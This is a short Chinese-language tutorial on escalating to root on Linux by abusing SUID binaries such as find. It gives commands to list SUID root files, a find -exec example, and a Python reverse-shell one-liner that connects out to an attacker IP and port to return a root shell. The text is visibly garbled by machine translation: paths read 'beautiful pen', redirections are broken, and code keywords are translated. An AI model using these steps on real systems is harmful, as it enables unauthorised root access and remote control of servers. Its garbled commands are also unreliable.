Linux提权,linux提权命令

　　SUID允许调用者以文件所有者的身份运行文件，所以使用SUID提升权限的思路是运行root用户拥有的SUID的文件，所以我们在运行文件的时候要得到root用户的身份。

　　可用于声明权力的已知linux可行性文件列表如下：

　　nmap vim find bash more less nano CP

　　以下命令可以发现系统上运行的所有SUID可执行文件。

　　1.#以下命令将尝试以root权限查找SUID的文件。不同的系统适合不同的命令。试试2。find/-perm-u=s-type F2/dev/null 3 . find/-user root-perm-4000-print 2/dev/null 4 . find/-user root-perm。

　　使用查找文件提升权限

　　如果我们现在得到了一个网站服务器的外壳，但是权限是ubuntu，我们需要马上提升到root用户的权限。

　　我们以超级用户权限查看SUID文件。

　　find/-perm -u=s -type f 2/dev/null

　　我们随便找一个命令利用一下，我们就找find，先查一下它的信息，发现确实是root用户权限的SUID的文件。

　　首先，让我们看看是否可以使用find命令以root身份运行，并且发现我们确实可以以root身份运行。

　　/usr/beautiful pen/find examples . desktop-exec whoami/；

　　至于这里为什么可以用find -exec，你可以查一下find帮助或者man手册。

　　然后我们检查目标网站上是否有python环境，可以看到有python2.7.6环境。

　　所以我们使用python作为root用户来反弹shell。

　　python -c 导入套接字、子进程、OS；s=socket.socket(socket。AF_INET，socket。SOCK _ STREAM)；s.connect((192.168.10.25 ，4444))；os.dup2(s.fileno()，0)；os.dup2(s.fileno()，1)；os.dup2(s.fileno()，2)；p=subprocess . call([/beautiful pen/sh ，-I ])；#弹起一枚sh型炮弹

　　大家可以看到，反弹回来的壳是攻击端收到的，是root。